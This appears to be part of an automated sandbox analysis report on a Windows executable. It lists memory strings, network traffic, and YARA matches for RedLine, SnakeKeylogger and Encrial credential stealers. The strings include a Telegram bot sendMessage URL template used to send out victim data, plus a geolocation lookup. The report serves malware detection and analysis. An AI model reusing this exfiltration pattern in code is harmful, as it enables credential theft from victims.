                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20a
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.00000000027C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.00000000027C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.00000000027C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002830000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002857000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72$
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.000000000379C000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003948000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003B75000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.000000000394B000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.00000000038D6000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003777000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003901000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003B2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.000000000379C000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003948000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.00000000038FB000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003B75000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003A51000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.000000000394B000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.00000000038D6000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003777000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003901000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003B2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4106386307.0000000003AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000297F000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000287B000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.000000000297A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2

                System Summary

                barindex
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0.0.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: Process Memory Space: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe PID: 7288, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_00408C600_2_00408C60
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0040DC110_2_0040DC11
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_00407C3F0_2_00407C3F
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_00418CCC0_2_00418CCC
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_00406CA00_2_00406CA0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_004028B00_2_004028B0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0041A4BE0_2_0041A4BE
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_00408C600_2_00408C60
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_004182440_2_00418244
